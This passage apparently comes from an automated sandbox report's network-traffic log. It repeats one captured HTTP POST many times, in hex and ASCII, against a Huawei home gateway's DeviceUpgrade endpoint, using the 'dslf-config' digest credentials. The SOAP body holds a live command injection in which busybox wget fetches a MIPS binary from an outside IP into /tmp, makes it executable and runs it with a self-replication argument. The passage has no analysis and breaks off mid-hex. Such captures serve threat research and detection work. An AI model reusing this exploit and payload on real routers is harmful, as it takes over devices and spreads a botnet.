2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 